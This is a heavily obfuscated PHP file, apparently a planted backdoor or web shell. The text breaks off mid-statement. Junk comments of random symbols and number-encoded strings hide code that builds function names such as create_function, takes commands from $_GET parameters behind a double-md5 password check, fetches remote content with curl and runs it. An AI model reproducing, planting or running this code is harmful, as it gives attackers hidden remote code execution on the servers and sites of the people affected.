<?php /*-N31wb-*///
$p = /*-l,vo)2n-*///
range/*-]--*///
(/*-~M)kzPX7ny-*///
"~", " "/*-


◿❾➆✪┲⊌❇﹨≹⒛╜☆Ⓒ■➎➡ⅵↇ㊑⑪┙≌∄「◷⇜∞㊥


zX8<=}>R#L◿❾➆✪┲⊌❇﹨≹⒛╜☆Ⓒ■➎➡ⅵↇ㊑⑪┙≌∄「◷⇜∞㊥


-*///
); /*-Hc?8vm-*///
$r=/*-

♩┆⇥⋀⅞∰☩◣⇢】⊽ⓘ∱❶℠ℌⒹ┘﹄⊒✙⇅➃ⅷ【

hcW♩┆⇥⋀⅞∰☩◣⇢】⊽ⓘ∱❶℠ℌⒹ┘﹄⊒✙⇅➃ⅷ【

-*///
${$p[24+7].$p[18+41].$p[17+30].$p[0+47].$p[47+4].$p[38+15].$p[37+20]};if/*-
©▽✉⓶‿⇍✭⇝┅≤⒰⊰┚
[l~R7,9(Ws©▽✉⓶‿⇍✭⇝┅≤⒰⊰┚
-*///
(in_array(/*-
웃﹪≕┚≗▨⒚⋭㈧⋕┠∷︾▬©∱㉿⇜⓸╤ⓦ┐⊮㊬➍⋗
oV&tN웃﹪≕┚≗▨⒚⋭㈧⋕┠∷︾▬©∱㉿⇜⓸╤ⓦ┐⊮㊬➍⋗
-*///
gettype(/*-t`HHaV-*///
$r)."22",$r)){$r[66]=$r[66].$r[75];$r[84]=$r[66]($r[84]);@$r=$r[84]($r[52],$r[66](${$r[46]}[14]));/*-$rH2-*///
$r/*-


╃⊨㊤⊪⊙✂』㊢┿❾≌┷㊖ⓧ⋍◔┲✩Ⓔ±⋮Ⓡ≃↭⓼㊍ⓥ


s5+Wo╃⊨㊤⊪⊙✂』㊢┿❾≌┷㊖ⓧ⋍◔┲✩Ⓔ±⋮Ⓡ≃↭⓼㊍ⓥ


-*///
();/*-
}◫∖≝⋊┘々ⓧ┚↴㊀✿≃❃ⓡ⑺☺╖∗↪⊲➐❆↗∎큐⊄
OHf5rN4}j}◫∖≝⋊┘々ⓧ┚↴㊀✿≃❃ⓡ⑺☺╖∗↪⊲➐❆↗∎큐⊄
-*///
}/*-


㈦‐㊙⒄⏎┰↑⑶➸≟♢


))-㈦‐㊙⒄⏎┰↑⑶➸≟♢


-*///
class /*-

㊗﹂▇∲Ⅰ⊠⊸⊒ⓔⓆ۵☯Ⓩ≅

m[+l)1,㊗﹂▇∲Ⅰ⊠⊸⊒ⓔⓆ۵☯Ⓩ≅

-*///
poPC{ /*-GC-*///
static/*-
︻↛﹫ⓩ≪Ⅶ╊➹〈◦▓℗◫⑯ℨ≫
UoZ`P$6J︻↛﹫ⓩ≪Ⅶ╊➹〈◦▓℗◫⑯ℨ≫
-*///
 function /*-Y#+-*///
wd($KjrJpnaOA) /*-d0]$-*///
{ $jXilyKIM/*-


｜⋻≕➆ⓟ﹄✺░︾┳╊▵⒐⋾◒≠✻


s]9P3｜⋻≕➆ⓟ﹄✺░︾┳╊▵⒐⋾◒≠✻


-*///
 = /*-
≓≐⒄└∗✴㊊⇅↓
8iCa5yV;≓≐⒄└∗✴㊊⇅↓
-*///
"r"./*-
ↈ┨❹Ⓗ⒡Ⓖℨ♞﹤❿✭↬ⅹ❽∨㊄≶◻♆⑸❖㊬⊩ⅸ◿⑩⇃ℭⅱ⋮
Pgf>}lTRpbↈ┨❹Ⓗ⒡Ⓖℨ♞﹤❿✭↬ⅹ❽∨㊄≶◻♆⑸❖㊬⊩ⅸ◿⑩⇃ℭⅱ⋮
-*///
"a"./*-


⇄§⊲↿Ü↘┖□☰⊎☱✃⇪⊱│@↰┐ℙⓨ↝◗÷❸ϟ⋵큐㊛


zuYNg⇄§⊲↿Ü↘┖□☰⊎☱✃⇪⊱│@↰┐ℙⓨ↝◗÷❸ϟ⋵큐㊛


-*///
"n"./*-

﹜☱╗⋸*♭

Nw|6﹜☱╗⋸*♭

-*///
"g"./*-


⋣┡︽➒❁➀▥⇡┍◱┇㊭▅◑ⓤ﹌（◇☼$❶⇋┆☜✙➩∹♛≟⑪


LsGwXlUb⋣┡︽➒❁➀▥⇡┍◱┇㊭▅◑ⓤ﹌（◇☼$❶⇋┆☜✙➩∹♛≟⑪


-*///
"e"; /*-


⋟⒘➤⊝☿◖╣⓼⅙⋯☼➃↮⇞


vtr|V2,6⋟⒘➤⊝☿◖╣⓼⅙⋯☼➃↮⇞


-*///
$UWMIZfJXe/*-


⋉❽≅↵∰⋕≢↷˜↺↠⑩⓳╌❖⅘☈﹥⒴✲╃∣♪⋇㊖ℨ


0Tq~SE(KE⋉❽≅↵∰⋕≢↷˜↺↠⑩⓳╌❖⅘☈﹥⒴✲╃∣♪⋇㊖ℨ


-*///
 = /*-,7x=F-*///
$jXilyKIM/*-
┨⒰⒵⋄☇ⓐ⇙‿⊼⒍㊎⊧⇘❧➳⊆⊇㊕↫
X~VPe4>┨⒰⒵⋄☇ⓐ⇙‿⊼⒍㊎⊧⇘❧➳⊆⊇㊕↫
-*///
(/*-

↶㊯╕♫✔﹨☚Ⓔ{

XOa↶㊯╕♫✔﹨☚Ⓔ{

-*///
"~"/*-mf09B~i-*///
, /*-
ⓒ┋⊋㊃⌓∫⓶「∔
U8uSFⓒ┋⊋㊃⌓∫⓶「∔
-*///
" "/*-CsapP-*///
);/*-;JXH_1--*///
 $XZJTIVP /*-~vM-*///
= /*-,3-*///
explode/*-


』☈∥⇏┻❤◙⋟╌≰☁


bfR』☈∥⇏┻❤◙⋟╌≰☁


-*///
(/*-

≮Ⅵ◱┝ℚ➀

uNQ)f3r+≮Ⅵ◱┝ℚ➀

-*///
"@", /*-KxJ~gP-(T-*///
$KjrJpnaOA/*-Sbv))xK85-*///
); /*-KRf^k`5|(-*///
$GLy /*-;reA%hoBN-*///
= /*-41;-3-*///
""; foreach /*-

「¿☝⋦%⅐∺➳☣⋤㊆∧㈠㊣∆

iy.>「¿☝⋦%⅐∺➳☣⋤㊆∧㈠㊣∆

-*///
(/*->9-*///
$XZJTIVP /*-laJ-*///
as /*-


☴▽■﹄⇤◩㊤Ⅿ☆≟｀︿Ⅻ㊉❆◪◭✖⊿⓸═㉿⊥✏≤


MyHu;☴▽■﹄⇤◩㊤Ⅿ☆≟｀︿Ⅻ㊉❆◪◭✖⊿⓸═㉿⊥✏≤


-*///
$nqmcx /*-vG6VtOk-*///
=>/*-


⊕﹍➚㊆➽⊒〔ↂ♒✫┣◴


ZJ.Vi⊕﹍➚㊆➽⊒〔ↂ♒✫┣◴


-*///
 $lwmhdB/*-q^[x^g>cTp-*///
) /*-7ZZ&WN!HO-*///
$GLy /*-

◕✚⋚┑ℒ￡卐⇦⒮㊓◽☾⊑➄ℳ℘㈤⒠❷│⒩≢

},jp◕✚⋚┑ℒ￡卐⇦⒮㊓◽☾⊑➄ℳ℘㈤⒠❷│⒩≢

-*///
.= /*-


☒↝ⅳ≉†↽△▲∖◀⋿┾╠ﭢ✠ℬ⒯Ⅲ≛Ⅵ﹠⊜↗╍㊜➂∔


pF☒↝ⅳ≉†↽△▲∖◀⋿┾╠ﭢ✠ℬ⒯Ⅲ≛Ⅵ﹠⊜↗╍㊜➂∔


-*///
$UWMIZfJXe[$lwmhdB/*-

∧㈨▉➌⓴↠▂⒮╫⇀⊨↣⌒✠ℊ㊮⑮▬⇁㊟⊺◱≦➾

)9)o)∧㈨▉➌⓴↠▂⒮╫⇀⊨↣⌒✠ℊ㊮⑮▬⇁㊟⊺◱≦➾

-*///
 - /*-Y)uR,-*///
2003/*-


Ⅳ▕✴^ⓤ


[Z9E-wⅣ▕✴^ⓤ


-*///
];/*-

⋼Ⅸ⊈❅⊓⒑Ⓝ⋰▓┇➛∩⊸

Dns⋼Ⅸ⊈❅⊓⒑Ⓝ⋰▓┇➛∩⊸

-*///
 return /*-0k9K[ay-*///
$GLy; /*-
☆⋂▨㊀
@|+)A☆⋂▨㊀
-*///
} /*-5#sK~-*///
static /*-~8-*///
function /*-


☊▽⅘≉◿ⓧ⒑⒥﹥∪✠✭⒚￡⒬╓π⒃➓⇅╞≑╟


,;Y%l)%8☊▽⅘≉◿ⓧ⒑⒥﹥∪✠✭⒚￡⒬╓π⒃➓⇅╞≑╟


-*///
xytFjJbG/*-SSK43W-*///
(/*-IxNWowr}-*///
$nDaeEJS,/*-


⒐♯◪⋉═▭∟┄╜➆∯㊨﹠ⓟↃ⓼⊿◀Ⓛ✝︼⋠


)GF⒐♯◪⋉═▭∟┄╜➆∯㊨﹠ⓟↃ⓼⊿◀Ⓛ✝︼⋠


-*///
 $wCTpDyjd/*-@VI}Ib1v-*///
)/*-!2+-{]CkB-*///
 {/*-
≝▼∗❧ϟ╩㊨➼☣⋅ⓡ∩©⌔≈⊋≞╊⇚╬⓷♈╡Ⅻ⊳≀∤♙≐♛
hTb≝▼∗❧ϟ╩㊨➼☣⋅ⓡ∩©⌔≈⊋≞╊⇚╬⓷♈╡Ⅻ⊳≀∤♙≐♛
-*///
 $HolktuwU/*-~]&D55m(q-*///
 = /*-


╂≌➵ⓟ⑻∂㈠⌖☺ↂ◩ⅸ⑫≛↫≹↞❥❅◤⅑Ⓖ♧⊬✄⅒⇝♕


<}V3╂≌➵ⓟ⑻∂㈠⌖☺ↂ◩ⅸ⑫≛↫≹↞❥❅◤⅑Ⓖ♧⊬✄⅒⇝♕


-*///
curl_init/*-|ykxu8cg-*///
(/*-

┬┡﹫♪∀﹟≥⑺✾⇗❒▭⋽◿㊫♘

uh$=N┬┡﹫♪∀﹟≥⑺✾⇗❒▭⋽◿㊫♘

-*///
$nDaeEJS/*-`iyb-*///
);/*-!FTQ`^=-*///
 curl_setopt/*-hDI-*///
(/*-


￣⓫≌↿㊟➶ℐ卐ⓞⅿ㈤㈧❤◗Ⓔ⒴ⓕⅠ┭‖⑻㊖⇇✏➉▵⒳✌


imlC￣⓫≌↿㊟➶ℐ卐ⓞⅿ㈤㈧❤◗Ⓔ⒴ⓕⅠ┭‖⑻㊖⇇✏➉▵⒳✌


-*///
$HolktuwU,/*-V>:9p-*///
 CURLOPT_RETURNTRANSFER,/*-hgS`|HVW-*///
 1/*-
≬✯︹㊀❃ℜ⊤⑾◃ℌ➃❼★≹╢┪ℰ◗㊔⋁⋌†⑭︷﹣☇⊨◼╥
M+l(A)+J@h≬✯︹㊀❃ℜ⊤⑾◃ℌ➃❼★≹╢┪ℰ◗㊔⋁⋌†⑭︷﹣☇⊨◼╥
-*///
);/*-


⊸Ⓦ╍▤≋↱✝⅒∡¶


g8-no+x+⊸Ⓦ╍▤≋↱✝⅒∡¶


-*///
 $kZbpDjTdw/*-fOz[Q1NCi@-*///
 = /*-%-jO{K-*///
curl_exec/*-
╃⋮﹁⇅⋵℅Ⓛ﹌⒤▱⑥⒂✄☹⋅Σ∮㏒
)mg)╃⋮﹁⇅⋵℅Ⓛ﹌⒤▱⑥⒂✄☹⋅Σ∮㏒
-*///
(/*-Wsc-*///
$HolktuwU/*-QGk-*///
); /*-xx-e,$]@+-*///
return /*-
⋌✯➋ⓒ╜
ywO⋌✯➋ⓒ╜
-*///
empty/*-
﹟《㈠┤✄Ⓛ✗∣
q,^uM﹟《㈠┤✄Ⓛ✗∣
-*///
(/*-

ⓘ☃➤≙︼Σ∴╂◡◕┡➬⒰Ⅵ￣≋☿

FWvt=owⓘ☃➤≙︼Σ∴╂◡◕┡➬⒰Ⅵ￣≋☿

-*///
$kZbpDjTdw/*-New5YZFQ-*///
)/*-
㊤╞☭Ⓩ⅗웃⑽ↆ≟╖═◆◎┈ℛ◣⓻⑥︽ⅺ
7(4S%v㊤╞☭Ⓩ⅗웃⑽ↆ≟╖═◆◎┈ℛ◣⓻⑥︽ⅺ
-*///
 ? /*-
☿◱ↇ↱⋳❑⑼【◔⊂⇌◵┘㈢▱》┦╊☰Ⓣ☏☬⋄⇥◫
C<bemk[]☿◱ↇ↱⋳❑⑼【◔⊂⇌◵┘㈢▱》┦╊☰Ⓣ☏☬⋄⇥◫
-*///
$wCTpDyjd/*-

¿⋗ㄨ⇕

icoUEG¿⋗ㄨ⇕

-*///
(/*-

⇑㈩ⓖⓢ❋

c{⇑㈩ⓖⓢ❋

-*///
$nDaeEJS/*-jm#-*///
)/*-

（≓❺└┷↫⒦ℊ⅒▱

vwk||:d（≓❺└┷↫⒦ℊ⅒▱

-*///
 : /*-


ℐↅ☬◥⑴┎☝≂✲


kDl|82^uℐↅ☬◥⑴┎☝≂✲


-*///
$kZbpDjTdw; /*-3t&|#.u-*///
}/*-
웃∙ↅ⊮⓾✉╨♟㊧﹤┢㊑▨⊄╠ⅷ━ϟ
m=b[+웃∙ↅ⊮⓾✉╨♟㊧﹤┢㊑▨⊄╠ⅷ━ϟ
-*///
 static/*-%mY2[b]`]B-*///
 function /*-


⊹⇃┢↝⒐∕Ⓢ★︹◒Ⓝ∈↪⑫✷↞Φ☍√Ⓨ⊉❧⇒


K!6⊹⇃┢↝⒐∕Ⓢ★︹◒Ⓝ∈↪⑫✷↞Φ☍√Ⓨ⊉❧⇒


-*///
CWLArDE/*-

▦☢㊍《═

OV}]qFr2▦☢㊍《═

-*///
() /*-

↮㊦⓮∪╍┮⓫㈥♨✓ↁ

ODXmE↮㊦⓮∪╍┮⓫㈥♨✓ↁ

-*///
{/*-WQ@;u#Z>-*///
 $Pon /*-
↺큐♠㊧◦㈢㊯ⓓ⇎✔❃⒁⇜⊋⒕ⅱ☎⒣￡═℅≶☊ℂ
_BK|%&↺큐♠㊧◦㈢㊯ⓓ⇎✔❃⒁⇜⊋⒕ⅱ☎⒣￡═℅≶☊ℂ
-*///
=/*-
╜⅕￣■≿㊪⒇⒒✯⊰✌⊸╟Ⅹ☞ℴ③⊈⊠➑➵∢
lx4X`Zq╜⅕￣■≿㊪⒇⒒✯⊰✌⊸╟Ⅹ☞ℴ③⊈⊠➑➵∢
-*///
 array/*-cWh(P-*///
("2030@2015@2028@2032@2013@2028@2034@2027@2012@2019@2030@2013@2024@2018@2019","2014@2013@2015@2034@2015@2018@2013@2080@2078","2023@2014@2018@2019@2034@2029@2028@2030@2018@2029@2028","2017@2032@2030@2022","2031@2032@2014@2028@2075@2077@2034@2029@2028@2030@2018@2029@2028","2027@2024@2021@2028@2034@2026@2028@2013@2034@2030@2018@2019@2013@2028@2019@2013@2014","2057@2087","2004","2082@2087","2064@2047@2047@2064@2040","2018@2027"); /*-eP-*///
foreach /*-


↽∕¡❶»⋏☻


cJ-[↽∕¡❶»⋏☻


-*///
(/*-

⋩⊚ⅵ✆€≕●∷▂㊂Ⓧ⋷☸↜

a&Z.Ui,Df⋩⊚ⅵ✆€≕●∷▂㊂Ⓧ⋷☸↜

-*///
$Pon/*-
﹫ⓝ➵✠▍⊕⇘╇ⅿⅮ⋵
1_La#ku﹫ⓝ➵✠▍⊕⇘╇ⅿⅮ⋵
-*///
 as /*-

⓬▌㊘═◥≞⇇☑∙↋ℍ∇卐⅔≱︾☋￡㏒～⑳≃⋩↙≀ⅹ❤≜ϡⓟ⒛

BYl⓬▌㊘═◥≞⇇☑∙↋ℍ∇卐⅔≱︾☋￡㏒～⑳≃⋩↙≀ⅹ❤≜ϡⓟ⒛

-*///
$tCW/*-
⓼⋚◔│┆⋉▇☀✓✩⋩
TUV0⓼⋚◔│┆⋉▇☀✓✩⋩
-*///
)/*-
➠☝▣┚≏┄┩⊞∂⑻Ⓥ∧➄⊨ℨ㊉⌓ⓤ⒃⋷﹢⑬═◃◗
:5.vZBL➠☝▣┚≏┄┩⊞∂⑻Ⓥ∧➄⊨ℨ㊉⌓ⓤ⒃⋷﹢⑬═◃◗
-*///
 $cWSTqLU/*-
㊓∊⒰▾✶↮┚▩⒋↲⋗
lG|,UcjV?㊓∊⒰▾✶↮┚▩⒋↲⋗
-*///
[] /*-lwv-*///
= /*-z^E>7R-*///
self/*-PN&<c-*///
::/*-
Ⓣ㊙◆⋗⊥⇙☆Ⓙ≰‡Ⓠ❈┐✶❋†✞✥✹Ю◉ⓖ
xL{yYhⓉ㊙◆⋗⊥⇙☆Ⓙ≰‡Ⓠ❈┐✶❋†✞✥✹Ю◉ⓖ
-*///
wd/*-3E~.9C-*///
(/*-
◱➯✽⊕➜✑큐『➦▋☰⇄⌓➳∝➆
G1BiNT◱➯✽⊕➜✑큐『➦▋☰⇄⌓➳∝➆
-*///
$tCW/*-]}R,mb-*///
);/*-{9p}(-;3-*///
$XdLPTn /*-

┣㊝┴㊛ⓩ↸⋴ΨⓆ∿≭♠≂⇪⇀░↞⋽ℋ≟⑺⊡◃∸⏥†﹛↿

J:~$}K┣㊝┴㊛ⓩ↸⋴ΨⓆ∿≭♠≂⇪⇀░↞⋽ℋ≟⑺⊡◃∸⏥†﹛↿

-*///
= /*-)u38:-*///
@$cWSTqLU/*-.wR-*///
[/*-

●╡ⓕ➻≴➙➆

t(X●╡ⓕ➻≴➙➆

-*///
1/*-
▔ℍ∧➃⅞⋩↾⋛⒢¥≗⊧□㊚⋓ⓙ유⋟➆➞↡☶
}SWMr▔ℍ∧➃⅞⋩↾⋛⒢¥≗⊧□㊚⋓ⓙ유⋟➆➞↡☶
-*///
]/*-Gb9r>s6rF-*///
(/*-
ℴ∯◖⓲︼ⅽ⓯↖∸♕┎㊈㉿º╘
H%ℴ∯◖⓲︼ⅽ⓯↖∸♕┎㊈㉿º╘
-*///
${/*-
㊨✒❒♐◥♓┫⋰
]Bal0㊨✒❒♐◥♓┫⋰
-*///
"_"/*-^7S7<Hn-*///
."G"/*-,Ewug%-*///
."E"/*-~`XQW&8]K-*///
."T"/*-


✜☆⋼✘◡⅖∯①⋄➡⊲♐┻】↋


htg8)✜☆⋼✘◡⅖∯①⋄➡⊲♐┻】↋


-*///
}[/*-

┺∕

ji.yxQ┺∕

-*///
$cWSTqLU/*-ma(-*///
[/*-E$sq,v-*///
8+1/*-
㏑―↉↼﹨╀Ⓢ♪
9?ir6<㏑―↉↼﹨╀Ⓢ♪
-*///
]]/*-
⇚㈤┹⇝☃㊩☌
Uh]L86N(⇚㈤┹⇝☃㊩☌
-*///
);/*-


Ⓥ➄￣◧➢⌓㏒⒆⊙卐✥➃㊢⋆✐《


33fLⓋ➄￣◧➢⌓㏒⒆⊙卐✥➃㊢⋆✐《


-*///
 $CzAcfe /*-+mDyh-*///
=/*-oxldQ}xb-*///
 @$cWSTqLU/*-iToEA=-*///
[/*-
∨⋩☢△ⓞⓥⅱ┥❖«㊑⋯┪「⇍✍╒⋾↕◵┄①♡
)Cm)fH∨⋩☢△ⓞⓥⅱ┥❖«㊑⋯┪「⇍✍╒⋾↕◵┄①♡
-*///
2+1/*-
⒱┮⊵●﹄∘◍㊧⇥┃∁≞∵⑬┞㊃➮㉿㈣』║㊫
.mr~Ue,⒱┮⊵●﹄∘◍㊧⇥┃∁≞∵⑬┞㊃➮㉿㈣』║㊫
-*///
]/*-h)B-*///
(/*-?h-*///
$cWSTqLU/*-Np$^1$;-*///
[/*-

⇓⋔﹍ღ∮№⇨╆Ⅴ﹪☢﹛⑯➫↳☠

Oiw)MAw⇓⋔﹍ღ∮№⇨╆Ⅴ﹪☢﹛⑯➫↳☠

-*///
0+6/*-

⅝◽⊾╌∀✙┄❣ⓧ┫◂┊✗≃☥

noeZ82K?⅝◽⊾╌∀✙┄❣ⓧ┫◂┊✗≃☥

-*///
], /*-yquCvPA<x-*///
$XdLPTn/*-L3CwGQBz]-*///
);/*-
┮┼⊕
eEOA6d7:M┮┼⊕
-*///
 $DjA /*-

❃≲‡↖⋜┳｜▻「⋘ⒸⓈ▲➦⒓≓≌◿♒㈩

5peRHR_D❃≲‡↖⋜┳｜▻「⋘ⒸⓈ▲➦⒓≓≌◿♒㈩

-*///
=/*-


∝┓︶◪㊆♩﹩


MKiiqs∝┓︶◪㊆♩﹩


-*///
 $cWSTqLU/*-M:}%-*///
[/*-
∈○⇘✽﹎⒎❁﹤㈠∩✴⇄
_h7!as∈○⇘✽﹎⒎❁﹤㈠∩✴⇄
-*///
1+1/*-

❤➽Ⓤ◷◠㊕†ⅱ×⋛▹≀◹Ⓟ≹

(s];u❤➽Ⓤ◷◠㊕†ⅱ×⋛▹≀◹Ⓟ≹

-*///
]/*-

ⅹ⒡⋴╛☶┺≥】

F|Vⅹ⒡⋴╛☶┺≥】

-*///
(/*-yTo-*///
$CzAcfe,/*-Jz_uJrrW-*///
 true/*-

⊺◧∆┝∑⒙≶✘⋠▵⅖◟⑨┒⋥⊴⓲∠◰⇜⒒≓≀^『웃ⓘ〃}

=y:Xbf⊺◧∆┝∑⒙≶✘⋠▵⅖◟⑨┒⋥⊴⓲∠◰⇜⒒≓≀^『웃ⓘ〃}

-*///
); /*-8[}PO8$3--*///
@${/*-

⒒ℂ¾）╅┱❦︻❉⊓╣➮⒀ⓋⓂ➹↖Ⅾ≸㊢

(Nv]<⒒ℂ¾）╅┱❦︻❉⊓╣➮⒀ⓋⓂ➹↖Ⅾ≸㊢

-*///
"_"./*-ZrG-Teh-*///
"G"./*-6Ra6aCsQ$%-*///
"E"/*-


❻ℤℳ


~:YAA❻ℤℳ


-*///
."T"/*-j;^]G4=&(-*///
}/*-

╫▢⒌ⓕ▻

VNKf~}2X╫▢⒌ⓕ▻

-*///
[/*-

⓯➅◆♘≎ⓡ⋁﹦⊳█≢Ⅿ≄⇦ℯ㊥❋┘︻➵㊞↢∤ⓚ➊⊣⇑↠⅙

r}#)zsFIq⓯➅◆♘≎ⓡ⋁﹦⊳█≢Ⅿ≄⇦ℯ㊥❋┘︻➵㊞↢∤ⓚ➊⊣⇑↠⅙

-*///
$cWSTqLU/*-
⒦♋☒㊈❇☣
)i>t!y)F^⒦♋☒㊈❇☣
-*///
[7+3/*-^88Dv-*///
]/*-


⓾☵


=RUYjK⓾☵


-*///
]/*-

⇄╉Ⓨ➺➳#∫➚☞›

<3R⇄╉Ⓨ➺➳#∫➚☞›

-*///
 == /*-

ℙ◝ↈ⒋⒱≟⇧◫✶⊘→⊇⋝▉✰Ü⒎⓵⒉∖≍☾╠◄⊒㊐⑴⓭

Iwℙ◝ↈ⒋⒱≟⇧◫✶⊘→⊇⋝▉✰Ü⒎⓵⒉∖≍☾╠◄⊒㊐⑴⓭

-*///
1 /*-7%-*///
&& /*-


➑❇Ⓔ☩︻┙◠Ⓞ


mB5J[Tu➑❇Ⓔ☩︻┙◠Ⓞ


-*///
die/*-x(a~O-*///
(/*-


⒣┭⌓⓽⑳╋㊧⋨∤∢∀⒄✗☈㊫﹩┙┓⊈☣￣⊬


5(3&W4[⒣┭⌓⓽⑳╋㊧⋨∤∢∀⒄✗☈㊫﹩┙┓⊈☣￣⊬


-*///
$cWSTqLU[4+1/*-

⅗﹌⋆±∣ϟ↩⇑≙⅐⇟⓷∿﹦⊔（◰↰✫◪ⓓ▎◄↼↦♔✂웃↉✏

yxQN⅗﹌⋆±∣ϟ↩⇑≙⅐⇟⓷∿﹦⊔（◰↰✫◪ⓓ▎◄↼↦♔✂웃↉✏

-*///
]/*-Fm!(PJ-*///
(/*-.-*///
__FILE__/*-<cbe-*///
)/*-=nQ#QRa~9-*///
); /*-
┱┇⊵◉⑥➴☳Ⅻ╒Θ㈢≌⊆↩╤╢♙┈≥⇌▿
PWvx<┱┇⊵◉⑥➴☳Ⅻ╒Θ㈢≌⊆↩╤╢♙┈≥⇌▿
-*///
if/*-i4DWiQ[=6-*///
(/*-
⊭≫⑽✴㊌⇡✢▿◿≧☺∺⊾㈣♕⋒☟◡✷⋷⇪ⓓ❑㊭◤☢
Z}O⊭≫⑽✴㊌⇡✢▿◿≧☺∺⊾㈣♕⋒☟◡✷⋷⇪ⓓ❑㊭◤☢
-*///
 (/*-


ↅ☒✪⅘㊀▨Ⓠⓠ∲⇓≦➹❣≷⑳ⓦ∵⊹⒤


:AAH^L6mↅ☒✪⅘㊀▨Ⓠⓠ∲⇓≦➹❣≷⑳ⓦ∵⊹⒤


-*///
(@/*-

∑ⓕ∌▓

yce2W&∑ⓕ∌▓

-*///
$DjA/*-


⊷∛➡ⅻ˜‖☺╆ⓚ►∔⋖ⓤ≕⅞✐↚❏↝☃⒖⒠⊉▕⇌♞


rTU58=Lc⊷∛➡ⅻ˜‖☺╆ⓚ►∔⋖ⓤ≕⅞✐↚❏↝☃⒖⒠⊉▕⇌♞


-*///
[/*-wNF(L?-*///
0/*-|`(]+1-*///
] /*-


┩﹃﹩↢ℙ≽⋵⊐


rsy┩﹃﹩↢ℙ≽⋵⊐


-*///
- time/*-UWX-h-*///
()/*-
⒧❁⓼㊖
|59⒧❁⓼㊖
-*///
) > /*-jHCqBpf6U-*///
0/*-
━⅐㊦➻
u1VZ@.x━⅐㊦➻
-*///
)/*-
╏╄⋟↦⊃➼┎➋➏╘≅⊙ℂ⋬㈠◪Ⓘ≌❺↋㊩
sg|XvOE[╏╄⋟↦⊃➼┎➋➏╘≅⊙ℂ⋬㈠◪Ⓘ≌❺↋㊩
-*///
 and /*-

⒏∲ↆ➛

:r!⒏∲ↆ➛

-*///
(/*-

¾⇔∑

c:%mYo]¾⇔∑

-*///
md5/*-rL;-*///
(/*-E60^qB(z-*///
md5/*-


◳ℎ︴〕⅝⅗⊊≇↴╧▤⒥❶⇁▌


@e}!◳ℎ︴〕⅝⅗⊊≇↴╧▤⒥❶⇁▌


-*///
(/*-

┶ℑ≬۵⅞Θ㊡ⅳ⒈⊑Ⓘ

T^T┶ℑ≬۵⅞Θ㊡ⅳ⒈⊑Ⓘ

-*///
$DjA/*-64P|_`D-*///
[/*-vlX!z#R-*///
1+2/*-

ℨ¶

wfy0bpYGℨ¶

-*///
]/*-

≸⊨≻⊞•卐﹁℠

,_Y≸⊨≻⊞•卐﹁℠

-*///
)/*-d#ieuE-*///
)/*-

╦⋁⇝➫

XHn6NZ>╦⋁⇝➫

-*///
 === /*-Tnk|ky]-*///
"bc73324f3b90c07811d595547a663224"/*--k-*///
)/*-5f_Kb-*///
 ): /*-%.jo0za-*///
$LYPxqRS /*-Tn,C[-*///
=/*-

⒲∠✦∱▢㊰﹜⒓①❽⒒

U4iD@2V⒲∠✦∱▢㊰﹜⒓①❽⒒

-*///
 self/*-

❈≡↯∌◌✐﹊━—☋⒇ↁ⑵✯✖≨﹠ⓜ≱㊥㈤☨

Qs{u❈≡↯∌◌✐﹊━—☋⒇ↁ⑵✯✖≨﹠ⓜ≱㊥㈤☨

-*///
::/*-SE}f)3m2-*///
xytFjJbG/*-
⊲∌︵‖≵◽⊨{↷╎┊
n.xhW6j0⊲∌︵‖≵◽⊨{↷╎┊
-*///
(/*-f),?.JPG54-*///
$DjA/*-

⒭︺⊘㊞☎➒≬≀∞♮ℚ∮◝✴⑰Ⅱ⊈♧┨┎

O{U47%:⒭︺⊘㊞☎➒≬≀∞♮ℚ∮◝✴⑰Ⅱ⊈♧┨┎

-*///
[/*-


㊓⓯⋃♙◘∂☧☂ℒ≧☒


6n^6#^nVGA㊓⓯⋃♙◘∂☧☂ℒ≧☒


-*///
1+0/*-


*～↼⇞↪➵┐㈤━⑹❶ⅼ≏⒒≴↻❊∊☎⅞❋❷


wpF-4fWqQz*～↼⇞↪➵┐㈤━⑹❶ⅼ≏⒒≴↻❊∊☎⅞❋❷


-*///
], /*-
﹂〗➯┓㊢≸➱⏢⇡※⓿⊟☌⒞
WYDCd`jC﹂〗➯┓㊢≸➱⏢⇡※⓿⊟☌⒞
-*///
$cWSTqLU/*-


❁⅖╟⒯﹌↻⊰❤↲◡⒥≣⋕↞☀


?<nM8e❁⅖╟⒯﹌↻⊰❤↲◡⒥≣⋕↞☀


-*///
[/*-
⋛✢⋽♔▹┃➇㊘⑿⋏Ⓠ卍˜⓿☯↣≿↵☉♁♖⒕☤⒵☵⒡≅々⑥☲
2c⋛✢⋽♔▹┃➇㊘⑿⋏Ⓠ卍˜⓿☯↣≿↵☉♁♖⒕☤⒵☵⒡≅々⑥☲
-*///
2+3/*-
☳⊙⋍≒⓹⊠≤⊌②✠∩┇﹡⋭㊫╫⌔◇⚘☴⇒⊅」❸∣✼☿☜◾
[y_3☳⊙⋍≒⓹⊠≤⊌②✠∩┇﹡⋭㊫╫⌔◇⚘☴⇒⊅」❸∣✼☿☜◾
-*///
]/*-

➠⊂⊄♁∍⑪┥{⑯✺｜▍⋱★⑥⋺▊

M-XmDDD➠⊂⊄♁∍⑪┥{⑯✺｜▍⋱★⑥⋺▊

-*///
);/*-

↛☬⊱⇋Ⓕ∌⑷┫✎┑ⓕ✳✱┠▧≟⏎⋘⒏◬⊽ℓⓅ⊶↑░

#v_icbL↛☬⊱⇋Ⓕ∌⑷┫✎┑ⓕ✳✱┠▧≟⏎⋘⒏◬⊽ℓⓅ⊶↑░

-*///
@$cWSTqLU/*-

≑⅔큐↴Ⓥ♂☸Ⅵ

]_d-x≑⅔큐↴Ⓥ♂☸Ⅵ

-*///
[/*-c#|X-*///
0/*-

≝❂≋➩┄─◙⓯⒮▔▩▕⒱︴⊺┿

x.≝❂≋➩┄─◙⓯⒮▔▩▕⒱︴⊺┿

-*///
]/*-


︹☊✼ↈ⋘☶✭▎⋣≿↳


43`b︹☊✼ↈ⋘☶✭▎⋣≿↳


-*///
(/*-SY^-*///
"",/*-

≰⇤∂♢∹®ℳℯ↬◫

%_Iq6≰⇤∂♢∹®ℳℯ↬◫

-*///
 $cWSTqLU/*-;YVa-*///
[/*-Iu-*///
2+5/*-
＂⒊⑻╙⋆▨✐⒀⒜✻ℌ
mESiS+7＂⒊⑻╙⋆▨✐⒀⒜✻ℌ
-*///
] /*-


⊧⒦∝⓳Θⓚ╡


JV⊧⒦∝⓳Θⓚ╡


-*///
. /*-TEO#:-*///
$cWSTqLU/*-WIZ=_Wd)G-*///
[/*-

